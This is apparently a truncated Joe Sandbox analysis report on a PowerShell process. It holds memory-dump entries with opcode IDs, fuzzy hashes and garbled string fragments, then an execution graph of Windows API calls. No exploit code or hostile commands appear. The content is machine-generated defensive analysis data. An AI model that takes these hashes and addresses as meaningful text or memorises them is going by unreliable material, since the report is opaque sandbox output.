                                                                                                                • Instruction Fuzzy Hash: EAD05E7770A1A08FC356677CB566169BFE1EBC635130880FFE24ECB291DA199C058792
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1796833114.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_b70000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                • Instruction ID: 9695fce397c4036b0fbc959cf8ee0a764cfbd52db32008a93b3986b92e09da77
                                                                                                                • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                • Instruction Fuzzy Hash: 44D042B0D042099F8B80EFA9894156EFBF4AB48200B6085AA8919E7211E6329A128BD5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1796833114.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_b70000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 396455b3a3c97d84fb7ecb04b5e93ebe3061022a02cd6157d1bd8fdde51f2f81
                                                                                                                • Instruction ID: fe6a2bf216d76bafb10d5a6987dc0b8708828393da0512092339e640fd4b719a
                                                                                                                • Opcode Fuzzy Hash: 396455b3a3c97d84fb7ecb04b5e93ebe3061022a02cd6157d1bd8fdde51f2f81
                                                                                                                • Instruction Fuzzy Hash: 8ED06731C05119CBCB0CABA5E85B4BEBF78FF14301F5041A9DB17922A0EE351A5ACAC5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1796833114.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_b70000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 94854ae7caa42338547f0ec58355400633890dfc5dea4b253e866c692dfff931
                                                                                                                • Instruction ID: c40d1db591a934cf3a7a4ab229f97600e1aba0d798dcf43e0f5d2aeccf00943c
                                                                                                                • Opcode Fuzzy Hash: 94854ae7caa42338547f0ec58355400633890dfc5dea4b253e866c692dfff931
                                                                                                                • Instruction Fuzzy Hash: DCD01734E0820A8BCB08EFA5E84A87EBFB8AB44300F008269DA49D3340EA305C01DBC5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1796833114.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_b70000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1ca89556bc01f899519196c2ec0a54941ea3cf0c9afbb5e3a3b20eb0c2df2e21
                                                                                                                • Instruction ID: e2d7e7658f2f95e56416dcceb434bc0c9a66df711da678fbe8b12e2278331cce
                                                                                                                • Opcode Fuzzy Hash: 1ca89556bc01f899519196c2ec0a54941ea3cf0c9afbb5e3a3b20eb0c2df2e21
                                                                                                                • Instruction Fuzzy Hash: A1D0923C14E3C49FC7268B79A8988583F616E4316430A05DED88A9F5B7CA66D448CB0A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1796833114.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_b70000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 98125134b5450aa57ae07201e0c60a51ee01b84cc5a3c7a3d9e9716db7b53b41
                                                                                                                • Instruction ID: e4c39a5145d9a02f4b1b6e6ef59baf825e80ccd0e8f735ee72e15cc8e28cca6e
                                                                                                                • Opcode Fuzzy Hash: 98125134b5450aa57ae07201e0c60a51ee01b84cc5a3c7a3d9e9716db7b53b41
                                                                                                                • Instruction Fuzzy Hash: 91C04C1951E3D10FDF4BD7354C695966F334A8311170A45EFD182DA866C958540AC716
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1796833114.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_b70000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: dd039d26f6877a8480764dfd168f1817705d8509fe94ef05d3dc63680f0c4de3
                                                                                                                • Instruction ID: 4054184fb6509c1d81060e7e9e98002356bab04c2f8f37401c0583255de11809
                                                                                                                • Opcode Fuzzy Hash: dd039d26f6877a8480764dfd168f1817705d8509fe94ef05d3dc63680f0c4de3
                                                                                                                • Instruction Fuzzy Hash: 82B09230045748CFC258AF75A408828736DBB4021538104ACE80E0A2A68E3AE884CA48
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1796833114.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_b70000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 166eb40100b767039727876dd59c1b589896e25836259629544c3c3194d76e45
                                                                                                                • Instruction ID: 8409278bec7055e1a9ce81f72878b2db873a7fbef9f9ba59f8b11b599b1061ea
                                                                                                                • Opcode Fuzzy Hash: 166eb40100b767039727876dd59c1b589896e25836259629544c3c3194d76e45
                                                                                                                • Instruction Fuzzy Hash: 06A002257533214AEB086F335A4927B3DDAABC05D2F4CC4B5F481C4195DE3DC1496615
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1809977733.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_71a0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'kq$4'kq$4'kq$4'kq$pigh$tPkq$tPkq$$kq$$kq
                                                                                                                • API String ID: 0-697042801
                                                                                                                • Opcode ID: 86ac25294aa3318d9d6edd72fcd28d86cbb9a9b3338c2dc150213cbbe703f52a
                                                                                                                • Instruction ID: d850deb0d29d7585d66b99213db9532b483063d80c3041b9bdc15bc0ed3605c7
                                                                                                                • Opcode Fuzzy Hash: 86ac25294aa3318d9d6edd72fcd28d86cbb9a9b3338c2dc150213cbbe703f52a
                                                                                                                • Instruction Fuzzy Hash: 98E15B79B0434AAFC7268B6894102A6BFF6BFD6210F1980BBC545CB2D6DB31C849C791
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1809977733.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_71a0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: fpq$`Qkq$`Qkq$tPkq$$kq$$kq$$kq$$kq$$kq
                                                                                                                • API String ID: 0-3516476561
                                                                                                                • Opcode ID: e835d03539e898b185d0011ae802cc6f873ec30cf34923d35b7e03590e87e542
                                                                                                                • Instruction ID: 2d2ee5a5f8981984acfec261eeb61bd4b932bf956e15bf81dd017e4034c57343
                                                                                                                • Opcode Fuzzy Hash: e835d03539e898b185d0011ae802cc6f873ec30cf34923d35b7e03590e87e542
                                                                                                                • Instruction Fuzzy Hash: 84619FB8A1420EFFDF2ACE54C644BAA77B2BF45311F258066E8059B2D0C775DD80DBA1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1809977733.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_71a0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'kq$4'kq$tPkq$tPkq$$kq$$kq$$kq$$kq
                                                                                                                • API String ID: 0-1263425659
                                                                                                                • Opcode ID: 46b156956e3138787ccf965ad2feecda32c6b81f4daabcfd0462aa92ede89d3b
                                                                                                                • Instruction ID: d3599f2eea5f4a7f2798748a5516840f15efad4aae3c1ce2ce6901f81ba22500
                                                                                                                • Opcode Fuzzy Hash: 46b156956e3138787ccf965ad2feecda32c6b81f4daabcfd0462aa92ede89d3b
                                                                                                                • Instruction Fuzzy Hash: 42B178B9304355AFC7269A799800766BFE6AFC6720F2480ABD455CB3D2CB31CD46C761
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1809977733.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_71a0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'kq$4'kq$4'kq$4'kq$$kq$$kq
                                                                                                                • API String ID: 0-374227784
                                                                                                                • Opcode ID: e556a7a552b8db1ed62ac56195cd3212adf61adffef20f41044fc251170eba4f
                                                                                                                • Instruction ID: 39dd056c09bdce63b92529e7c0a15b75ca8bd234d372e69a44b5bb7bf47c0152
                                                                                                                • Opcode Fuzzy Hash: e556a7a552b8db1ed62ac56195cd3212adf61adffef20f41044fc251170eba4f
                                                                                                                • Instruction Fuzzy Hash: 2E214BB6B083465FC33A552C6420276AFE76FC626073D40ABC441CB3D6EB29CC068396
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1796833114.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_b70000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 8$`lq$`lq$`lq$`lq
                                                                                                                • API String ID: 0-1430259753
                                                                                                                • Opcode ID: 1a643f63afd0e237b9aa78ad09a0afdfa3486fe66375693013b641ec4968e7aa
                                                                                                                • Instruction ID: 8399bc8b17aa1634a26486611ed18bfc1a73fa1cdac6acb387836b93c82c00b5
                                                                                                                • Opcode Fuzzy Hash: 1a643f63afd0e237b9aa78ad09a0afdfa3486fe66375693013b641ec4968e7aa
                                                                                                                • Instruction Fuzzy Hash: B8C1E774E002099FDB55DFA9D980A9DFBF2FF88300F10866AD819AB355DB30A945CF90
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1809977733.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_71a0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'kq$4'kq$$kq$$kq$$kq
                                                                                                                • API String ID: 0-1023320533
                                                                                                                • Opcode ID: c04a3e93b6411ffb3d838ca7a68967363403e3bece892464c5937249eee30fc5
                                                                                                                • Instruction ID: b1bc6834c43776b0ec6661733c2d10024a67ddb83b618712ad28728274ec0507
                                                                                                                • Opcode Fuzzy Hash: c04a3e93b6411ffb3d838ca7a68967363403e3bece892464c5937249eee30fc5
                                                                                                                • Instruction Fuzzy Hash: CD516CF9704346AFD72A5BA98800367BFB6AFC2620F24806BD425CB3D1DB35C446C791
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1796833114.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_b70000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: `lq$`lq$`lq$`lq
                                                                                                                • API String ID: 0-2331155588
                                                                                                                • Opcode ID: 3997404ba7751d406a7f350712623d38e31878f5b4a5f2e4b6210e8f4b0dcf3f
                                                                                                                • Instruction ID: a4ab0dd55394934c5656143242eeeefe011037468ae1b340701a3f9d98823724
                                                                                                                • Opcode Fuzzy Hash: 3997404ba7751d406a7f350712623d38e31878f5b4a5f2e4b6210e8f4b0dcf3f
                                                                                                                • Instruction Fuzzy Hash: 40B18674E002099FCB55DFA9D990A9DFBF2FF88300F108629E819AB355DB71A945CF90
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1809977733.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_71a0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $kq$$kq$$kq$$kq
                                                                                                                • API String ID: 0-2881790790
                                                                                                                • Opcode ID: 1476cf9d88bdd180912c950b5cbb9160ca95c32bc17eb104b5d136439caebd90
                                                                                                                • Instruction ID: 90b218839758918902d0b80be4d949c0ff5392e8b33f370d554aff7356256007
                                                                                                                • Opcode Fuzzy Hash: 1476cf9d88bdd180912c950b5cbb9160ca95c32bc17eb104b5d136439caebd90
                                                                                                                • Instruction Fuzzy Hash: F8317CB630C381AFD72696768C017667FE79FC2310F69449BD544DB2C3D62AD919C321
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1809977733.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_71a0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $kq$$kq$$kq$$kq
                                                                                                                • API String ID: 0-2881790790
                                                                                                                • Opcode ID: 3d5646bb788dc98b1a44ee3e233e2802065bda5c8a082f85d7afb2bb4b8d1f7a
                                                                                                                • Instruction ID: 9625348b9e81aa8b8fa6c051b4d99e2ed1ef89c85efece7e5a19859699d219f0
                                                                                                                • Opcode Fuzzy Hash: 3d5646bb788dc98b1a44ee3e233e2802065bda5c8a082f85d7afb2bb4b8d1f7a
                                                                                                                • Instruction Fuzzy Hash: 24218BB9308306ABDB38656BCC0173BB7DB6BC0314F64842AE505DB3C5DE39D8518361

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:7.5%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:3.8%
                                                                                                                Total number of Nodes:1721
                                                                                                                Total number of Limit Nodes:66
                                                                                                                execution_graph 64138 7ff6f1d9c8de 64143 7ff6f1d9d4b0 64138->64143 64144 7ff6f1d9d4d6 64143->64144 64145 7ff6f1d9d502 64144->64145 64158 7ff6f1da9fb0 64144->64158 64172 7ff6f1d9e200 64145->64172 64148 7ff6f1d9c8e6 64149 7ff6f1dfe860 64148->64149 64150 7ff6f1dfe869 64149->64150 64151 7ff6f1d9c91b 64150->64151 64152 7ff6f1dfec3c IsProcessorFeaturePresent 64150->64152 64153 7ff6f1dfec54 64152->64153 64277 7ff6f1dfee34 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 64153->64277 64155 7ff6f1dfec67 64278 7ff6f1dfec08 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 64155->64278 64159 7ff6f1daa150 64158->64159 64160 7ff6f1da9ffa 64158->64160 64203 7ff6f1d90640 82 API calls 64159->64203 64161 7ff6f1daa016 64160->64161 64165 7ff6f1daa07a 64160->64165 64170 7ff6f1daa02a memcpy_s 64160->64170 64163 7ff6f1daa156 64161->64163 64164 7ff6f1dfe888 std::_Facet_Register 82 API calls 64161->64164 64204 7ff6f1d7b820 82 API calls 2 library calls 64163->64204 64164->64170 64189 7ff6f1dfe888 64165->64189 64168 7ff6f1daa15c 64171 7ff6f1daa113 _Receive_impl 64170->64171 64198 7ff6f1de8254 64170->64198 64171->64145 64173 7ff6f1d9e223 64172->64173 64176 7ff6f1d9e21d 64172->64176 64175 7ff6f1d9e23a 64173->64175 64222 7ff6f1d90ca0 64173->64222 64174 7ff6f1d9e2a7 64174->64148 64175->64176 64178 7ff6f1d9e2d4 64175->64178 64176->64174 64177 7ff6f1da9fb0 82 API calls 64176->64177 64177->64174 64243 7ff6f1d7cdc0 82 API calls 64178->64243 64180 7ff6f1d9e316 64244 7ff6f1e00e88 64180->64244 64182 7ff6f1d9e327 64186 7ff6f1d9e355 64182->64186 64249 7ff6f1d98d10 82 API calls 5 library calls 64182->64249 64184 7ff6f1d9e400 64184->64148 64185 7ff6f1d9e200 82 API calls 64185->64186 64186->64184 64186->64185 64250 7ff6f1d98d10 82 API calls 5 library calls 64186->64250 64190 7ff6f1dfe893 64189->64190 64191 7ff6f1dfe8ac 64190->64191 64193 7ff6f1dfe8b2 64190->64193 64205 7ff6f1df9f1c 64190->64205 64191->64170 64194 7ff6f1dfe8bd 64193->64194 64208 7ff6f1dff8dc RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 64193->64208 64209 7ff6f1d7b820 82 API calls 2 library calls 64194->64209 64197 7ff6f1dfe8c3 64216 7ff6f1de80cc 78 API calls _invalid_parameter_noinfo 64198->64216 64200 7ff6f1de826d 64217 7ff6f1de8284 IsProcessorFeaturePresent 64200->64217 64204->64168 64210 7ff6f1df9f5c 64205->64210 64208->64194 64209->64197 64215 7ff6f1dec3bc EnterCriticalSection 64210->64215 64216->64200 64218 7ff6f1de8297 64217->64218 64221 7ff6f1de7f68 14 API calls 3 library calls 64218->64221 64220 7ff6f1de82b2 GetCurrentProcess TerminateProcess 64221->64220 64223 7ff6f1d90cdd 64222->64223 64225 7ff6f1d90d51 64223->64225 64226 7ff6f1d90d73 64223->64226 64231 7ff6f1d90ced _Receive_impl 64223->64231 64224 7ff6f1dfe860 _Strcoll 8 API calls 64227 7ff6f1d90f1f 64224->64227 64251 7ff6f1de4648 64225->64251 64229 7ff6f1de4648 78 API calls 64226->64229 64227->64175 64237 7ff6f1d90da1 memcpy_s 64229->64237 64230 7ff6f1d90ec1 64230->64231 64233 7ff6f1d90fa7 64230->64233 64231->64224 64234 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 64233->64234 64235 7ff6f1d90fac 64234->64235 64236 7ff6f1d90fd4 64235->64236 64242 7ff6f1d90ca0 82 API calls 64235->64242 64236->64175 64237->64230 64239 7ff6f1de4648 78 API calls 64237->64239 64241 7ff6f1d90f57 64237->64241 64272 7ff6f1d98d10 82 API calls 5 library calls 64237->64272 64238 7ff6f1d90feb 64238->64175 64239->64237 64241->64230 64273 7ff6f1de7754 78 API calls 3 library calls 64241->64273 64242->64238 64243->64180 64245 7ff6f1e00ea7 64244->64245 64246 7ff6f1e00ef2 RaiseException 64245->64246 64247 7ff6f1e00ed0 RtlPcToFileHeader 64245->64247 64246->64182 64248 7ff6f1e00ee8 64247->64248 64248->64246 64249->64186 64250->64186 64252 7ff6f1de4682 64251->64252 64253 7ff6f1de4664 64251->64253 64274 7ff6f1de4934 EnterCriticalSection 64252->64274 64275 7ff6f1de4e68 11 API calls memcpy_s 64253->64275 64256 7ff6f1de4669 64276 7ff6f1de8234 78 API calls _invalid_parameter_noinfo 64256->64276 64263 7ff6f1de4674 64263->64231 64272->64237 64273->64241 64275->64256 64276->64263 64277->64155 64279 7ff6f1dbd080 64380 7ff6f1d7eaf0 64279->64380 64282 7ff6f1d7eaf0 97 API calls 64283 7ff6f1dbd954 64282->64283 64296 7ff6f1dbdd76 _Receive_impl 64283->64296 64386 7ff6f1d7d4e0 64283->64386 64284 7ff6f1dfe860 _Strcoll 8 API calls 64286 7ff6f1dbdda1 64284->64286 64295 7ff6f1dbdd3d 64295->64296 64297 7ff6f1dbddbd 64295->64297 64296->64284 64298 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 64297->64298 64299 7ff6f1dbddc2 64298->64299 64425 7ff6f1d979f0 64299->64425 64304 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 64305 7ff6f1dbde0d 64304->64305 64453 7ff6f1d7e1d0 64305->64453 64381 7ff6f1d7eb21 64380->64381 64459 7ff6f1e0b5b0 64381->64459 64384 7ff6f1dfe860 _Strcoll 8 API calls 64385 7ff6f1d7ebc2 64384->64385 64385->64282 64387 7ff6f1d7d509 64386->64387 64507 7ff6f1d86940 64387->64507 64389 7ff6f1d7d59a 64390 7ff6f1d7d370 64389->64390 64391 7ff6f1d7d3a0 64390->64391 64524 7ff6f1e0b260 64391->64524 64394 7ff6f1d7d43a 64407 7ff6f1dbfdd0 64394->64407 64397 7ff6f1d7d3f3 64398 7ff6f1d7d48f 64397->64398 64530 7ff6f1d927e0 64397->64530 64539 7ff6f1d7c530 82 API calls Concurrency::cancel_current_task 64398->64539 64402 7ff6f1d7d410 64536 7ff6f1e0b2d0 WideCharToMultiByte WideCharToMultiByte GetLastError WideCharToMultiByte GetLastError 64402->64536 64404 7ff6f1d7d42f 64404->64394 64537 7ff6f1d7c530 82 API calls Concurrency::cancel_current_task 64404->64537 64406 7ff6f1d7d489 64538 7ff6f1d7c160 82 API calls 2 library calls 64406->64538 64408 7ff6f1dbfdf6 64407->64408 64606 7ff6f1dc0920 64408->64606 64410 7ff6f1dbd9ab 64411 7ff6f1dcf8f0 64410->64411 64612 7ff6f1dcf020 64411->64612 64414 7ff6f1dcf94a 64416 7ff6f1d7f380 78 API calls 64414->64416 64417 7ff6f1dcf9bd 64416->64417 64418 7ff6f1dfe860 _Strcoll 8 API calls 64417->64418 64419 7ff6f1dbda5d 64418->64419 64420 7ff6f1d7f380 64419->64420 64421 7ff6f1d7f3c2 _Receive_impl 64420->64421 64422 7ff6f1d7f394 64420->64422 64421->64295 64422->64421 64423 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 64422->64423 64424 7ff6f1d7f3e8 64423->64424 64424->64295 64426 7ff6f1d97a40 64425->64426 64427 7ff6f1d97a6e 64426->64427 64428 7ff6f1d98560 82 API calls 64426->64428 65212 7ff6f1d93d70 64427->65212 64428->64427 64430 7ff6f1d97a8a 64431 7ff6f1d93d70 82 API calls 64430->64431 64432 7ff6f1d97aa4 64431->64432 64433 7ff6f1d97ac0 64432->64433 64434 7ff6f1d97b17 64433->64434 65234 7ff6f1d7ebf0 64434->65234 64436 7ff6f1d97b55 65258 7ff6f1da0400 64436->65258 64438 7ff6f1d97b69 _Receive_impl 64441 7ff6f1d97d2f 64438->64441 64443 7ff6f1d97d35 64438->64443 64452 7ff6f1d97d29 64438->64452 65268 7ff6f1e00740 64438->65268 64439 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 64439->64441 64442 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 64441->64442 64442->64443 64446 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 64443->64446 64444 7ff6f1d97cf1 _Receive_impl 64448 7ff6f1dfe860 _Strcoll 8 API calls 64444->64448 64447 7ff6f1d97d3b 64446->64447 64450 7ff6f1d97d16 64448->64450 64449 7ff6f1d97d24 64451 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 64449->64451 64450->64304 64451->64452 64452->64439 64454 7ff6f1d7e1e9 64453->64454 65282 7ff6f1d7db70 87 API calls 2 library calls 64454->65282 64456 7ff6f1d7e220 64457 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 64456->64457 64458 7ff6f1d7e231 64457->64458 64462 7ff6f1e0b5f2 64459->64462 64460 7ff6f1e0b5fb 64461 7ff6f1dfe860 _Strcoll 8 API calls 64460->64461 64464 7ff6f1d7eb3d 64461->64464 64462->64460 64463 7ff6f1e0b70d 64462->64463 64466 7ff6f1e0b653 GetFileAttributesExW 64462->64466 64502 7ff6f1e0b984 CreateFileW GetLastError 64463->64502 64464->64384 64468 7ff6f1e0b667 GetLastError 64466->64468 64469 7ff6f1e0b6b8 64466->64469 64467 7ff6f1e0b730 64470 7ff6f1e0b756 64467->64470 64471 7ff6f1e0b736 64467->64471 64468->64460 64472 7ff6f1e0b676 FindFirstFileW 64468->64472 64469->64460 64469->64463 64477 7ff6f1e0b803 64470->64477 64478 7ff6f1e0b765 GetFileInformationByHandleEx 64470->64478 64475 7ff6f1e0b74f 64471->64475 64476 7ff6f1e0b741 CloseHandle 64471->64476 64473 7ff6f1e0b68a GetLastError 64472->64473 64474 7ff6f1e0b695 FindClose 64472->64474 64473->64460 64474->64469 64475->64460 64476->64475 64479 7ff6f1e0b8c5 64476->64479 64480 7ff6f1e0b858 64477->64480 64481 7ff6f1e0b81e GetFileInformationByHandleEx 64477->64481 64482 7ff6f1e0b77f GetLastError 64478->64482 64483 7ff6f1e0b7a5 64478->64483 64503 7ff6f1de98b4 78 API calls __std_fs_directory_iterator_open 64479->64503 64484 7ff6f1e0b8ab 64480->64484 64485 7ff6f1e0b86f 64480->64485 64481->64480 64487 7ff6f1e0b834 GetLastError 64481->64487 64482->64475 64488 7ff6f1e0b78d CloseHandle 64482->64488 64483->64477 64490 7ff6f1e0b7c6 GetFileInformationByHandleEx 64483->64490 64484->64475 64491 7ff6f1e0b8b1 CloseHandle 64484->64491 64485->64460 64489 7ff6f1e0b875 CloseHandle 64485->64489 64487->64475 64493 7ff6f1e0b846 CloseHandle 64487->64493 64488->64475 64500 7ff6f1e0b8d6 64488->64500 64489->64460 64489->64479 64490->64477 64495 7ff6f1e0b7e2 GetLastError 64490->64495 64491->64475 64491->64479 64492 7ff6f1e0b8ca 64504 7ff6f1de98b4 78 API calls __std_fs_directory_iterator_open 64492->64504 64493->64475 64501 7ff6f1e0b8d0 64493->64501 64495->64475 64498 7ff6f1e0b7f0 CloseHandle 64495->64498 64498->64475 64498->64492 64506 7ff6f1de98b4 78 API calls __std_fs_directory_iterator_open 64500->64506 64505 7ff6f1de98b4 78 API calls __std_fs_directory_iterator_open 64501->64505 64502->64467 64508 7ff6f1d86a64 64507->64508 64511 7ff6f1d86966 64507->64511 64523 7ff6f1d7b8e0 82 API calls 64508->64523 64510 7ff6f1d869df 64516 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 64510->64516 64521 7ff6f1d86971 memcpy_s 64510->64521 64512 7ff6f1d86a5f 64511->64512 64514 7ff6f1d869ca 64511->64514 64515 7ff6f1d86a22 64511->64515 64511->64521 64522 7ff6f1d7b820 82 API calls 2 library calls 64512->64522 64514->64512 64518 7ff6f1d869d7 64514->64518 64517 7ff6f1dfe888 std::_Facet_Register 82 API calls 64515->64517 64519 7ff6f1d86a70 64516->64519 64517->64521 64520 7ff6f1dfe888 std::_Facet_Register 82 API calls 64518->64520 64520->64510 64521->64389 64522->64508 64540 7ff6f1df69a4 64524->64540 64527 7ff6f1d7d3ac 64527->64394 64527->64406 64529 7ff6f1e0b2d0 WideCharToMultiByte WideCharToMultiByte GetLastError WideCharToMultiByte GetLastError 64527->64529 64528 7ff6f1e0b272 AreFileApisANSI 64528->64527 64529->64397 64531 7ff6f1d92804 64530->64531 64532 7ff6f1d927ed 64530->64532 64535 7ff6f1d9281e memcpy_s 64531->64535 64589 7ff6f1d98e80 64531->64589 64532->64402 64534 7ff6f1d9286c 64534->64402 64535->64402 64536->64404 64538->64398 64545 7ff6f1de9eec GetLastError 64540->64545 64546 7ff6f1de9f10 FlsGetValue 64545->64546 64547 7ff6f1de9f2d FlsSetValue 64545->64547 64548 7ff6f1de9f27 64546->64548 64565 7ff6f1de9f1d 64546->64565 64549 7ff6f1de9f3f 64547->64549 64547->64565 64548->64547 64571 7ff6f1deda30 64549->64571 64550 7ff6f1de9f99 SetLastError 64552 7ff6f1de9fb9 64550->64552 64553 7ff6f1de9fa6 64550->64553 64585 7ff6f1de98b4 78 API calls __std_fs_directory_iterator_open 64552->64585 64567 7ff6f1dec178 64553->64567 64556 7ff6f1de9f6c FlsSetValue 64560 7ff6f1de9f8a 64556->64560 64561 7ff6f1de9f78 FlsSetValue 64556->64561 64557 7ff6f1de9f5c FlsSetValue 64559 7ff6f1de9f65 64557->64559 64578 7ff6f1ded3c8 64559->64578 64584 7ff6f1de9c9c 11 API calls memcpy_s 64560->64584 64561->64559 64564 7ff6f1de9f92 64566 7ff6f1ded3c8 __free_lconv_num 11 API calls 64564->64566 64565->64550 64566->64550 64568 7ff6f1dec1a0 64567->64568 64569 7ff6f1dec18d 64567->64569 64568->64527 64568->64528 64569->64568 64588 7ff6f1df5c14 78 API calls 3 library calls 64569->64588 64576 7ff6f1deda41 wcsftime 64571->64576 64572 7ff6f1deda92 64586 7ff6f1de4e68 11 API calls memcpy_s 64572->64586 64573 7ff6f1deda76 HeapAlloc 64574 7ff6f1de9f4e 64573->64574 64573->64576 64574->64556 64574->64557 64576->64572 64576->64573 64577 